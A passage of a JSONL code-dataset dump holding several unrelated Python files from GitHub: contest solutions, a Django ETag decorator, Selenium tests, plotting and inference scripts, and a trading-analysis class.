\"S\"}) and ((i, j) in shortest_lengths):\n if best is None or best > shortest_lengths[(i, j)]:\n best = shortest_lengths[(i, j)]\n\n 
print(best)\n","repo_name":"danieltsoukup/adventofcode","sub_path":"2022/code/day12_part2.py","file_name":"day12_part2.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38746609631","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ndef solve():\n n, k = map(int, input().split())\n ans = 0\n if n >= k:\n ans = (n - k + 1) / n\n al = [2 ** i for i in range(1, 18)]\n for i in range(1, min(n + 1, k)):\n for j in al:\n if i * j >= k:\n ans += (1 / n) * (1 / j)\n break\n print(ans)\n\nif __name__==\"__main__\":\n solve()\n","repo_name":"yumechi/AtCoderHandoutCodes","sub_path":"ABC/ABC126/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"37106097068","text":"# -*- coding: utf-8 -*-\nimport logging\nfrom functools import wraps\n\nfrom django.utils.decorators import available_attrs\nfrom django.utils.http import parse_etags, quote_etag\n\nfrom rest_framework import status\nfrom rest_framework.permissions import SAFE_METHODS\nfrom rest_framework.response import Response\n\nfrom rest_framework_extensions.utils import prepare_header_name\nfrom rest_framework_extensions.settings import extensions_api_settings\nfrom django.utils import six\n\n\nlogger = logging.getLogger('django.request')\n\n\nclass ETAGProcessor(object):\n \"\"\"Based on https://github.com/django/django/blob/master/django/views/decorators/http.py\"\"\"\n def __init__(self, etag_func=None, rebuild_after_method_evaluation=False):\n if not etag_func:\n etag_func = extensions_api_settings.DEFAULT_ETAG_FUNC\n self.etag_func = etag_func\n self.rebuild_after_method_evaluation = rebuild_after_method_evaluation\n\n def __call__(self, func):\n this = self\n @wraps(func, assigned=available_attrs(func))\n def inner(self, request, *args, **kwargs):\n return 
this.process_conditional_request(\n view_instance=self,\n view_method=func,\n request=request,\n args=args,\n kwargs=kwargs,\n )\n return inner\n\n def process_conditional_request(self,\n view_instance,\n view_method,\n request,\n args,\n kwargs):\n etags, if_none_match, if_match = self.get_etags_and_matchers(request)\n res_etag = self.calculate_etag(\n view_instance=view_instance,\n view_method=view_method,\n request=request,\n args=args,\n kwargs=kwargs,\n )\n\n if self.is_if_none_match_failed(res_etag, etags, if_none_match):\n if request.method in SAFE_METHODS:\n response = Response(status=status.HTTP_304_NOT_MODIFIED)\n else:\n response = self._get_and_log_precondition_failed_response(request=request)\n elif self.is_if_match_failed(res_etag, etags, if_match):\n response = self._get_and_log_precondition_failed_response(request=request)\n else:\n response = view_method(view_instance, request, *args, **kwargs)\n if self.rebuild_after_method_evaluation:\n res_etag = self.calculate_etag(\n view_instance=view_instance,\n view_method=view_method,\n request=request,\n args=args,\n kwargs=kwargs,\n )\n\n if res_etag and not response.has_header('ETag'):\n response['ETag'] = quote_etag(res_etag)\n\n return response\n\n def get_etags_and_matchers(self, request):\n etags = None\n if_none_match = request.META.get(prepare_header_name(\"if-none-match\"))\n if_match = request.META.get(prepare_header_name(\"if-match\"))\n if if_none_match or if_match:\n # There can be more than one ETag in the request, so we\n # consider the list of values.\n try:\n etags = parse_etags(if_none_match or if_match)\n except ValueError:\n # In case of invalid etag ignore all ETag headers.\n # Apparently Opera sends invalidly quoted headers at times\n # (we should be returning a 400 response, but that's a\n # little extreme) -- this is Django bug #10681.\n if_none_match = None\n if_match = None\n return etags, if_none_match, if_match\n\n def calculate_etag(self,\n view_instance,\n view_method,\n 
request,\n args,\n kwargs):\n if isinstance(self.etag_func, six.string_types):\n etag_func = getattr(view_instance, self.etag_func)\n else:\n etag_func = self.etag_func\n return etag_func(\n view_instance=view_instance,\n view_method=view_method,\n request=request,\n args=args,\n kwargs=kwargs,\n )\n\n def is_if_none_match_failed(self, res_etag, etags, if_none_match):\n if res_etag and if_none_match:\n return res_etag in etags or '*' in etags\n else:\n return False\n\n def is_if_match_failed(self, res_etag, etags, if_match):\n if res_etag and if_match:\n return res_etag not in etags and '*' not in etags\n else:\n return False\n\n def _get_and_log_precondition_failed_response(self, request):\n logger.warning('Precondition Failed: %s', request.path,\n extra={\n 'status_code': status.HTTP_200_OK,\n 'request': request\n }\n )\n return Response(status=status.HTTP_412_PRECONDITION_FAILED)\n\n\netag = ETAGProcessor","repo_name":"snowman-st/edu-back","sub_path":"lib/python3.5/site-packages/rest_framework_extensions/etag/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"26013220256","text":"from selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.expected_conditions import element_to_be_clickable\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\n\ndef test_add_delete(_url_provider, _driver, _wait):\n test_item = 'add_remove'\n test_url = _url_provider.get_test_url(test_item)\n _driver.get(test_url)\n \n add_elem_path = '//*[@id=\"content\"]/div/button'\n add_button = _driver.find_element_by_xpath(add_elem_path)\n\n for i in range(3):\n add_button.click()\n \n del_elem_path = '//*[@id=\"elements\"]/button[3]'\n delete_button = _wait.until(element_to_be_clickable((By.XPATH, del_elem_path)))\n is_element_present = delete_button.is_displayed()\n\n if 
is_element_present:\n for i in range(3):\n del_elem_path = f'//*[@id=\"elements\"]/button[{3-i}]'\n delete_button = _driver.find_element_by_xpath(del_elem_path)\n delete_button.click()\n \n del_elem_path = '//*[@id=\"elements\"]/button[1]'\n \n try:\n _driver.find_element_by_xpath(del_elem_path)\n isDeleted = False\n except Exception:\n isDeleted = True\n\n assert test_url == 'http://the-internet.herokuapp.com/add_remove_elements/'\n assert _driver.current_url == test_url\n assert is_element_present == True\n assert isDeleted == True\n\n _driver.quit()\n\ndef test_checkboxes(_url_provider, _driver, _wait):\n test_item = 'checkboxes'\n test_url = _url_provider.get_test_url(test_item)\n _driver.get(test_url)\n\n checkbox_1_locator = '//*[@id=\"checkboxes\"]/input[1]'\n checkbox_2_locator = '//*[@id=\"checkboxes\"]/input[2]'\n \n checkbox_1 = _wait.until(EC.presence_of_element_located((By.XPATH, checkbox_1_locator)))\n checkbox_1.click()\n\n checkbox_2 = _wait.until(EC.presence_of_element_located((By.XPATH, checkbox_2_locator)))\n checkbox_2.click()\n res_1 = checkbox_1.is_selected()\n res_2 = checkbox_2.is_selected()\n\n assert res_1 == True\n assert res_2 == False\n\n","repo_name":"ArtDemid/InfopulseUniversity","sub_path":"hometasks/selenium_webdriver_hometask/test_pytest_selesnium_base.py","file_name":"test_pytest_selesnium_base.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7715364290","text":"from ..model.create_database import User\nfrom ..model.create_database import Admin\nfrom flask import make_response\nfrom ..connect_to_aws import database\n\n\n\ndef return_role_by_email_method(email):\n output_message = {\n \"message\": \"Information waiting for confirmation\"\n }\n user = User.query.filter_by(user_email=email).first()\n admin = Admin.query.filter_by(admin_email=email).first()\n if user:\n status_code = 200\n output_message['message'] = \"this email 
owner is a user\"\n elif admin:\n status_code = 200\n output_message['message'] = 'this email owner is an admin'\n else:\n status_code = 400\n output_message['message'] = \"this is not our system's email\"\n output_json = make_response(output_message)\n output_json.status_code = status_code\n output_json.message = output_message['message']\n database.session.close()\n return output_json\n","repo_name":"COMP5703-CS57-3/Online-Gift-Shop","sub_path":"backend/main/service/return_role_by_email.py","file_name":"return_role_by_email.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13779369426","text":"import os\nimport sys\ncode_dir = '/afs/inf.ed.ac.uk/user/s17/s1771906/masters-project/ben-rhodes-masters-project/proposal/code'\ncode_dir_2 = '/home/ben/ben-rhodes-masters-project/proposal/code'\ncode_dir_3 = '/afs/inf.ed.ac.uk/user/s17/s1771906/masters-project/ben-rhodes-masters-project/proposal/code/neural_network'\ncode_dirs = [code_dir, code_dir_2, code_dir_3]\nfor code_dir in code_dirs:\n if code_dir not in sys.path:\n sys.path.append(code_dir)\n\nimport numpy as np\nimport os\nimport pickle\nimport seaborn as sns\n\nfrom matplotlib import pyplot as plt\nfrom matplotlib import rc\nfrom numpy import random as rnd\nfrom scipy.integrate import dblquad\nfrom scipy.optimize import minimize\nfrom scipy.stats import norm, multivariate_normal\nfrom sklearn.neighbors import KernelDensity as kd\n\nfrom plot import save_fig\n\nrc('lines', linewidth=0.5)\nrc('font', size=8)\nrc('legend', fontsize=10)\nrc('text', usetex=True)\n\n\ndef joint_distribution(model, z1, z2, x):\n \"\"\"\n param z1: float or array (n, 1)\n param z1: float or array (n, 1)\n param x: array (2, ) or (n, 2)\n \"\"\"\n z = np.array([z1, z2])\n z = z.reshape(1, 1, 2)\n x = x.reshape(1, 2)\n return model(x, z)\n\n\ndef compute_true_landmark_marginals(model, x_landmarks):\n p_x = np.zeros(len(x_landmarks))\n 
integral_limit = 10\n\n for i, x_i in enumerate(x_landmarks):\n res = dblquad(lambda z1, z2: joint_distribution(model, z1, z2, x_i), -integral_limit, integral_limit,\n lambda z1: -integral_limit, lambda z2: integral_limit)\n p_x[i] = res[0]\n \n return p_x\n\n\ndef plot_contours(ax, f, lim, num_contours, levels=None):\n delta = 0.05\n x = np.arange(-lim, lim, delta)\n y = np.arange(-lim, lim, delta)\n X, Y = np.meshgrid(x, y)\n mesh = np.vstack([X.flatten(), Y.flatten()]).T\n Z = f(mesh).reshape(X.shape)\n if levels:\n ax.contour(X, Y, Z, num_contours, colors='black', alpha=0.7, levels=levels, linewidths=1)\n else:\n ax.contour(X, Y, Z, num_contours, colors='black', alpha=0.3)\n\n\ndef plot_prior(ax, z):\n ax.set_title(r'$P(z): \\mathcal{N}(0, \\textbf{I})$', fontsize=10)\n sns.regplot(x=z[:, 0], y=z[:, 1], fit_reg=False, color='grey', ax=ax, scatter_kws={'s': 1})\n plot_contours(ax, lambda x: multivariate_normal.pdf(x, np.zeros(2), np.identity(2)), 10, 10)\n\n\ndef plot_p_x(ax, x, x_landmarks):\n # ax.set_title(r'$P(x): \\mathcal{N}(\\textbf{w}, c \\textbf{I})$', fontsize=8)\n ax.set_title(r'$P(x)$', fontsize=10)\n sns.regplot(x=x[:, 0], y=x[:, 1], fit_reg=False, color='grey', ax=ax, scatter_kws={'s': 1})\n landmark_cols = ['red', 'green', 'blue']\n # landmark_cols = ['red', 'orange', 'green', 'blue', 'purple']\n for i, x_i in enumerate(x_landmarks):\n ax.scatter(x_i[0], x_i[1], color=landmark_cols[i], s=35, edgecolors='k')\n\n\ndef plot_noise(ax, noise, sample_size, noise_num):\n if noise_num == 1:\n ax.set_title(r'$P_y^1(Y): \\mathcal{N}(\\bar{\\textbf{x}}, \\bar{\\Sigma})$', fontsize=10)\n if noise_num == 2:\n ax.set_title(r'$P_y^2(Y): \\mathcal{N}(0, 30 \\textbf{I})$', fontsize=10)\n y = noise.sample(sample_size)\n sns.regplot(x=y[:, 0], y=y[:, 1], fit_reg=False, color='grey', ax=ax, scatter_kws={'s': 1})\n plot_contours(ax, lambda x: noise(x), 10, 10)\n\n\ndef plot_marginals(x, z, x_landmarks, noise, bad_noise, sample_size, title, save_dir):\n fig, axs = 
plt.subplots(2, 2, figsize=(3.25, 3.25), sharex=True, sharey=True)\n axs = axs.ravel()\n plot_prior(axs[0], z)\n plot_p_x(axs[1], x, x_landmarks)\n plot_noise(axs[2], noise, sample_size, 1)\n plot_noise(axs[3], bad_noise, sample_size, 2)\n\n for ax in axs:\n ax.set_xlim(-7, 7)\n ax.set_ylim(-7, 7)\n fig.tight_layout()\n save_fig(fig, save_dir + 'figs/', title)\n\n\ndef plot_true_posterior(ax, model, z1_mesh, z2_mesh, x, p_x, cmap):\n mesh = np.vstack([z1_mesh.flatten(), z2_mesh.flatten()]).T # (gridsize, 2)\n p_mesh = model(x, mesh) / p_x\n p_mesh = p_mesh.reshape(z1_mesh.shape)\n # ax.pcolormesh(z1_mesh, z2_mesh, p_mesh, cmap=cmap)\n ax.contourf(z1_mesh, z2_mesh, p_mesh, cmap=cmap)\n\n\ndef plot_approx_posterior(ax, z1_mesh, z2_mesh, x, p_x, cmap, posterior, model):\n mesh = np.vstack([z1_mesh.flatten(), z2_mesh.flatten()]).T\n p_mesh = posterior(mesh, x)\n p_mesh = p_mesh.reshape(z1_mesh.shape)\n # ax.pcolormesh(z1_mesh, z2_mesh, p_mesh, cmap=cmap)\n ax.contourf(z1_mesh, z2_mesh, p_mesh, cmap=cmap)\n plot_contours(ax, lambda z: model(x, z) / p_x, 5, 1, levels=[0.05])\n\n\ndef plot_landmark_posteriors(x_landmarks,\n p_x, model,\n free_energy_posterior,\n vnce_posterior,\n bad_vnce_posterior,\n bad_vnce_posterior_nu50,\n title,\n save_dir):\n nbins = 300\n axis_lim = 5\n z1_mesh, z2_mesh = np.mgrid[-axis_lim:axis_lim:nbins*1j, -axis_lim:axis_lim:nbins*1j]\n # cmaps = [plt.cm.YlOrRd, plt.cm.YlGn, plt.cm.GnBu]\n cmaps = [plt.cm.YlOrRd_r, plt.cm.YlGn_r, plt.cm.GnBu_r]\n # cmaps = [plt.cm.YlOrRd_r, plt.cm.Oranges_r, plt.cm.YlGn_r, plt.cm.Blues_r, plt.cm.Purples_r]\n\n sns.set_style('darkgrid')\n sns.set_palette(sns.color_palette(\"pastel\"))\n num_rows, num_cols = 5, 3\n fig, axs = plt.subplots(num_rows, num_cols, figsize=(3.25, 5.4))\n\n for j in range(num_cols):\n plot_true_posterior(axs[0, j], model, z1_mesh, z2_mesh, x_landmarks[j], p_x[j], cmaps[j])\n plot_approx_posterior(axs[1, j], z1_mesh, z2_mesh, np.array([x_landmarks[j]]), p_x[j], cmaps[j], 
free_energy_posterior, model)\n plot_approx_posterior(axs[2, j], z1_mesh, z2_mesh, np.array([x_landmarks[j]]), p_x[j], cmaps[j], vnce_posterior, model)\n plot_approx_posterior(axs[3, j], z1_mesh, z2_mesh, np.array([x_landmarks[j]]), p_x[j], cmaps[j], bad_vnce_posterior, model)\n plot_approx_posterior(axs[4, j], z1_mesh, z2_mesh, np.array([x_landmarks[j]]), p_x[j], cmaps[j], bad_vnce_posterior_nu50, model)\n\n # remove space between subplots and add row labels\n for ax in axs.ravel():\n ax.tick_params(axis='x', which='both', bottom=False, top=False, labelbottom=False)\n ax.tick_params(axis='y', which='both', left=False, right=False, labelleft=False)\n ax.set_aspect('equal')\n\n # add label to each row\n rows = ['True', 'KL', 'Noise 1\\n' + r'$\\nu=1$', 'Noise 2\\n' + r'$\\nu=1$', 'Noise 2\\n' + r'$\\nu=10$']\n pad = 5 # in points\n for ax, row in zip(axs[:, 0], rows):\n ax.annotate(row, xy=(0, 0.5), xytext=(-ax.yaxis.labelpad - pad, 0), xycoords=ax.yaxis.label,\n textcoords='offset points', size='large', ha='right', va='center')\n\n fig.subplots_adjust(left=0.15, wspace=0, hspace=0.1)\n save_fig(fig, save_dir + 'figs/', title)\n\n\ndef model_to_noise_frac(x, z, pos, model, noise, nu):\n joint_noise = nu * pos(z, x) * noise(x)\n model_val = model(x, z)\n return joint_noise / (joint_noise + model_val)\n\n\ndef print_landmark_prob_of_noise_class(model, noise, bad_noise, vnce_pos, bad_vnce_pos, bad_vnce_pos_nu50, x_landmarks):\n landmarks = np.array(x_landmarks)\n good_z_landmarks = vnce_pos.sample(1, landmarks)\n bad_z_landmarks = bad_vnce_pos.sample(1, landmarks)\n bad50_z_landmarks = bad_vnce_pos_nu50.sample(1, landmarks)\n print(model_to_noise_frac(landmarks, good_z_landmarks, vnce_pos, model, noise, 1))\n print(model_to_noise_frac(landmarks, bad_z_landmarks, bad_vnce_pos, model, bad_noise, 1))\n print(model_to_noise_frac(landmarks, bad50_z_landmarks, bad_vnce_pos_nu50, model, bad_noise, 50))\n\n\ndef main():\n load_dir = 
'/afs/inf.ed.ac.uk/user/s17/s1771906/masters-project-non-code/experiments/stars-and-moons/'\n save_dir = load_dir\n\n model = pickle.load(open(os.path.join(load_dir, 'truncate=False_model.p'), 'rb'))\n # model_trunc = pickle.load(open(os.path.join(save_dir, 'truncate=True_model.p'), 'rb'))\n\n fe_pos = pickle.load(open(os.path.join(load_dir, 'FreeEnergyLoss_truncate_gaussian=False_good_noise_nu1_var_dist.p'), 'rb'))\n vnce_pos = pickle.load(open(os.path.join(load_dir, 'VnceLoss_truncate_gaussian=False_good_noise_nu1_var_dist.p'), 'rb'))\n bad_vnce_pos = pickle.load(open(os.path.join(load_dir, 'VnceLoss_truncate_gaussian=False_bad_noise_nu1_var_dist.p'), 'rb'))\n bad_vnce_pos_nu10 = pickle.load(open(os.path.join(load_dir, 'VnceLoss_truncate_gaussian=False_bad_noise_nu10_var_dist.p'), 'rb'))\n\n # fe_pos_trunc = pickle.load(open(os.path.join(save_dir, 'FreeEnergyLoss_truncate_gaussian=True_good_noise_nu1_var_dist.p'), 'rb'))\n # vnce_pos_trunc = pickle.load(open(os.path.join(save_dir, 'VnceLoss_truncate_gaussian=True_good_noise_nu1_var_dist.p'), 'rb'))\n # bad_vnce_pos_trunc = pickle.load(open(os.path.join(save_dir, 'VnceLoss_truncate_gaussian=True_bad_noise_nu1_var_dist.p'), 'rb'))\n # bad_vnce_pos_nu50_trunc = pickle.load(open(os.path.join(save_dir, 'VnceLoss_truncate_gaussian=True_bad_noise_nu50_var_dist.p'), 'rb'))\n\n noise = pickle.load(open(os.path.join(load_dir, 'good_noise.p'), 'rb'))\n bad_noise = pickle.load(open(os.path.join(load_dir, 'bad_noise.p'), 'rb'))\n\n sample_size = 500\n Z, X = model.sample(sample_size)\n # Z_trunc, X_trunc = model_trunc.sample(sample_size)\n\n x_landmarks = [np.array([-5, -5]), np.array([0, 0]), np.array([5, 5])]\n # x_landmarks_trunc = [np.array([-2, -2]), np.array([0, 0]), np.array([2, 2])]\n\n plot_marginals(X, Z, x_landmarks, noise, bad_noise, sample_size, title='marginals-for-gaussian-model', save_dir=save_dir)\n # plot_marginals(X_trunc, Z_trunc, x_landmarks_trunc, noise, bad_noise, sample_size, 
title='marginals-for-truncated-gaussian-model', save_dir=save_dir)\n\n p_x = compute_true_landmark_marginals(model, x_landmarks)\n # p_x_trunc = compute_true_landmark_marginals(model_trunc, x_landmarks_trunc)\n\n plot_landmark_posteriors(x_landmarks,\n p_x,\n model,\n fe_pos,\n vnce_pos,\n bad_vnce_pos,\n bad_vnce_pos_nu10,\n title='landmark-posteriors-gaussian-model',\n save_dir=save_dir)\n # plot_landmark_posteriors(x_landmarks_trunc,\n # p_x_trunc,\n # model_trunc,\n # fe_pos_trunc,\n # vnce_pos_trunc,\n # bad_vnce_pos_trunc,\n # bad_vnce_pos_nu50_trunc,\n # title='landmark-posteriors-truncated-gaussian-model',\n # save_dir=save_dir)\n\n print_landmark_prob_of_noise_class(model, noise, bad_noise, vnce_pos, bad_vnce_pos, bad_vnce_pos_nu10, x_landmarks)\n # print_landmark_prob_of_noise_class(model_trunc, noise, bad_noise, vnce_pos_trunc, bad_vnce_pos_trunc, bad_vnce_pos_nu50_trunc, x_landmarks_trunc)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"benrhodes26/VNCE","sub_path":"proposal/code/scripts/stars_and_moons/posterior visualisations.py","file_name":"posterior visualisations.py","file_ext":"py","file_size_in_byte":11048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32349913446","text":"__author__ = 'TimeWz667'\n__all__ = ['name_generator', 'NameGenerator']\n\n\ndef name_generator(prefix, start, by):\n i = int(start)\n by = int(by) if by >= 1 else by\n\n while True:\n yield '{}{}'.format(prefix, i)\n i += by\n\n\nclass NameGenerator:\n def __init__(self, prefix, start=0, by=1):\n self.Prefix = prefix\n self.Start = start\n self.By = by\n self.Index = int(start)\n\n def reset(self):\n self.Index = int(self.Start)\n\n def get_next(self):\n i, self.Index = self.Index, self.Index + self.By\n return '{}{}'.format(self.Prefix, i)\n\n def to_json(self):\n return {\n 'Prefix': self.Prefix,\n 'Start': self.Start,\n 'By': self.By\n }\n\n @staticmethod\n def from_json(js):\n return 
NameGenerator(js['Prefix'], js['Start'], js['By'])\n\n\nif __name__ == '__main__':\n ng = NameGenerator('Ag', 1, 1)\n print(ng.get_next())\n print(ng.get_next())\n","repo_name":"CxModelling/PyComplexism","sub_path":"complexism/misc/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36969805451","text":"import tensorflow as tf\r\nimport config\r\nfrom tqdm import tqdm\r\n\r\n\r\n\r\ndef get_target(self,data):\r\n text=data[\"text\"]\r\n text_id=data[\"TEXTID\"]\r\n sentiment=data[\"sentiment\"]\r\n \r\n encoded_text=config.TOKENIZER.encode(text)\r\n ids=encoded_text.ids\r\n type_ids=encoded_text.type_ids\r\n attention=encoded_text.attention_mask\r\n \r\n if(len(ids)>config.MAX_LEN):\r\n ids=ids[:config.MAX_LEN-5]\r\n type_ids=type_ids[:config.MAX_LEN-5]\r\n attention=attention[:config.MAX_LEN-5]\r\n \r\n pad=config.MAX_LEN-len(ids)\r\n\r\n ids=ids+[0]*pad\r\n type_ids=type_ids+[0]*pad\r\n attention=attention+[0]*pad\r\n\r\n return {\"orig\":text,\"id\":text_id,\"input_ids\":ids,\"token_type_ids\":type_ids,\"attention_mask\":attention}\r\n\r\n\r\ndef gen(data):\r\n \"\"\"(inputs, targets)\"\"\"\r\n for i in range(len(data)):\r\n yield get_target(data.iloc[i])\r\n\r\ndef get_text(text,pred):\r\n \r\n pred_texts=[]\r\n orig_texts=[]\r\n text=text.numpy()\r\n pred=tf.argmax(pred,axis=1).numpy()\r\n\r\n for t,p in zip(text,pred):\r\n orig_texts.append(t.decode(\"utf-8\"))\r\n t=config.TOKENIZER.encode(orig_texts[-1]).offsets\r\n i,j=p[0],p[1]\r\n pred_texts.append(orig_texts[-1][t[i][0]:t[j][1]])\r\n \r\n return pred_texts\r\n\r\ndef run():\r\n test_data=pd.read_csv(config.TESTING_FILE)\r\n test_dataset=tf.data.Dataset.from_generator(gen(test_data),\r\n output_types={\"orig\":tf.string,\"id\":tf.string,\"input_ids\":tf.int32,\r\n \"token_type_ids\":tf.int32,\"attention_mask\":tf.int32}\r\n ).batch(config.VALID_BATCH_SIZE)\r\n\r\n 
model=tf.keras.models.load_model(config.MODEL_PATH)\r\n\r\n output_texts=[]\r\n for data in tqdm(test_dataset):\r\n orig_text=data[\"orig\"]\r\n preds=model.predict(data)\r\n output_texts=output_texts+get_text(orig_text,preds)\r\n \r\n sample = pd.read_csv(\"kaggle/input/tweet-sentiment-extraction/sample_submission.csv\")\r\n sample.loc[:, 'selected_text'] = output_texts\r\n sample.to_csv(\"submission.csv\", index=False)\r\n\r\nif __name__==\"__main__\":\r\n run()\r\n","repo_name":"Jask-AI/BERT_SETUP_TF","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40764967738","text":"from itertools import combinations\nimport pandas as pd\n\n\nclass MoaCalculator:\n def __init__(self, label_series: pd.Series, versus_series: pd.Series):\n self.label_series = label_series\n self.versus_series = versus_series\n\n def calculate(self):\n \"\"\"Calculates the MOA score\"\"\"\n label_mean = self.label_series.mean()\n versus_mean = self.versus_series.mean()\n cat = pd.concat([self.label_series, self.versus_series])\n std = cat.std()\n score = abs(label_mean - versus_mean) / std\n return score\n\n\nclass MoaTable:\n def __init__(self, data: dict):\n self.table = pd.DataFrame(data)\n\n def rank(self):\n self.table[\"rank\"] = self.table.groupby([\"label\", \"versus\"])[\"score\"].rank(\n ascending=False\n )\n return self\n\n\nclass MoaScores:\n def __init__(self, table):\n self.table = self._sort_data_frame(table, [\"rank\", \"label\", \"versus\"])\n\n @staticmethod\n def _sort_data_frame(df: pd.DataFrame, col: list[str]):\n return df.sort_values(by=col, ascending=True).reset_index(drop=True)\n\n def get_by_rank(self, rank: int):\n return self.table[self.table[\"rank\"] == rank]\n\n def get_by_ranks(self, lower: int, upper: int) -> pd.DataFrame:\n \"\"\"returns the table by rank range\"\"\"\n return self.table[(self.table[\"rank\"] 
>= lower) & (self.table[\"rank\"] <= upper)]\n\n def to_csv(self, path: str) -> None:\n self.table.to_csv(path, index=False)\n return None\n\n\nclass MoaScoreGenerator:\n def __init__(self, sampled_data: pd.DataFrame, label_col: str):\n self.sampled_data = sampled_data\n self.label_col = label_col\n self._cols_2_skip = [\"system:index\", \"isTraining\", \".geo\", self.label_col]\n\n @property\n def cols_2_skip(self):\n return self._cols_2_skip\n\n def add_cols_2_skip(self, cols: list[str]):\n self._cols_2_skip.extend(cols)\n return None\n\n def generate_scores(self) -> MoaScores:\n labels = self.sampled_data[self.label_col].unique().tolist()\n combos = combinations(labels, 2)\n\n moa_tables = []\n\n for combo in combos:\n dfc = self.sampled_data.copy()\n dfc = dfc[\n (dfc[self.label_col] == combo[0]) | (dfc[self.label_col] == combo[1])\n ]\n table_data = {\"label\": [], \"versus\": [], \"predictor\": [], \"score\": []}\n for col in dfc.columns:\n if col in self.cols_2_skip:\n continue\n dfc1 = dfc[dfc[self.label_col] == combo[0]][col]\n dfc2 = dfc[dfc[self.label_col] == combo[1]][col]\n\n moa = MoaCalculator(dfc1, dfc2)\n\n table_data[\"label\"].append(combo[0])\n table_data[\"versus\"].append(combo[1])\n table_data[\"predictor\"].append(col)\n table_data[\"score\"].append(moa.calculate())\n\n moa_table = MoaTable(table_data)\n moa_table.rank()\n moa_tables.append(moa_table.table)\n\n return MoaScores(pd.concat(moa_tables))\n","repo_name":"Wetlands-NWRC/earth-engine-scripts","sub_path":"ee-measure-of-assocation/moa/scores.py","file_name":"scores.py","file_ext":"py","file_size_in_byte":3079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3149073054","text":"class Analysis():\n \n def __init__(self, asset_df, date):\n self.asset_df = asset_df\n self.date = date\n self.twentyfive_days = {}\n self.fifty_days = {}\n self.hundred_days = {}\n \n def get_position(self, date):\n # Get index location of date\n 
position = -1\n for day in self.asset_df.index:\n position += 1\n if date in str(day):\n break\n return position\n \n def recent_ma_hist(self, days=60):\n # Check the ratio of days the closing price has stayed above each moving average\n total_days = 0\n date_position = self.get_position(self.date)\n ma_status = {'MA': 0, 'MA.1': 0, '10': 0, '50': 0, '200': 0}\n for cal_date in pd.date_range(self.asset_df.index[date_position - days], self.asset_df.index[date_position]):\n total_days += 1 \n for mov_avg in ['MA', 'MA.1', '10', '50', '200']:\n if self.asset_df.loc[cal_date]['close'] > self.asset_df.loc[cal_date][mov_avg]:\n ma_status[mov_avg] += 1\n \n for avg in ma_status.keys():\n ma_status[avg] = ma_status[avg] / total_days\n \n return ma_status\n \n def price_trends(self):\n date_position = self.get_position(self.date)\n \n # Previous hundred days data\n hundred = {}\n for date in pd.date_range(self.asset_df.index[date_position - 100], self.asset_df.index[date_position]):\n hundred['low'].append((self.asset_df.loc[str(date).split(' ')[0]]['low']))\n hundred['high'].append((self.asset_df.loc[str(date).split(' ')[0]]['high']))\n hundred['open'].append((self.asset_df.loc[str(date).split(' ')[0]]['open']))\n hundred['close'].append((self.asset_df.loc[str(date).split(' ')[0]]['close']))\n hundred['daily change'].append((self.asset_df.loc[str(date).split(' ')[0]]['close'])\n - (self.asset_df.loc[str(date).split(' ')[0]]['open']))\n # Previous fifty days data\n fifty = {}\n for date in pd.date_range(self.asset_df.index[date_position - 50], self.asset_df.index[date_position]):\n fifty['low'].append(self.asset_df.loc[str(date).split(' ')[0]]['low'])\n fifty['high'].append(self.asset_df.loc[str(date).split(' ')[0]]['high'])\n fifty['open'].append(self.asset_df.loc[str(date).split(' ')[0]]['open'])\n fifty['close'].append(self.asset_df.loc[str(date).split(' ')[0]]['close'])\n fifty['daily change'].append((self.asset_df.loc[str(date).split(' ')[0]]['close'])\n - 
(self.asset_df.loc[str(date).split(' ')[0]]['open']))\n # Previous twenty five days data \n twenty_five = {}\n for date in pd.date_range(self.asset_df.index[date_position - 25], self.asset_df.index[date_position]):\n twenty_five['low'].append(self.asset_df.loc[str(date).split(' ')[0]]['low'])\n twenty_five['high'].append(self.asset_df.loc[str(date).split(' ')[0]]['high'])\n twenty_five['open'].append(self.asset_df.loc[str(date).split(' ')[0]]['open'])\n twenty_five['close'].append(self.asset_df.loc[str(date).split(' ')[0]]['close'])\n twenty_five['daily change'].append((self.asset_df.loc[str(date).split(' ')[0]]['close'])\n - (self.asset_df.loc[str(date).split(' ')[0]]['open']))\n \n # Add data to the dictionary for twenty five day analysis\n self.twentyfive_days['avg daily change'] = np.mean(twenty_five['daily change'])\n self.twentyfive_days['std_dev'] = np.std(twenty_five['close'])\n self.twentyfive_days['long term ma'] = self.recent_ma_hist(days=25)['200']\n self.twentyfive_days['med term ma'] = self.recent_ma_hist(days=25)['50']\n self.twentyfive_days['short term ma'] = self.recent_ma_hist(days=25)['MA']\n \n # Add data to the dictionary for fifty day analysis\n self.fifty_days['avg daily change'] = np.mean(fifty['daily change'])\n self.fifty_days['std dev'] = np.std(fifty['close'])\n self.fifty_days['long term ma'] = self.recent_ma_hist(days=50)['200']\n self.fifty_days['med term ma'] = self.recent_ma_hist(days=50)['50']\n self.fifty_days['short term ma'] = self.recent_ma_hist(days=50)['MA']\n \n # Add data to the dictionary for one hundred day analysis\n self.hundred_days['avg daily change'] = np.mean(hundred['daily change'])\n 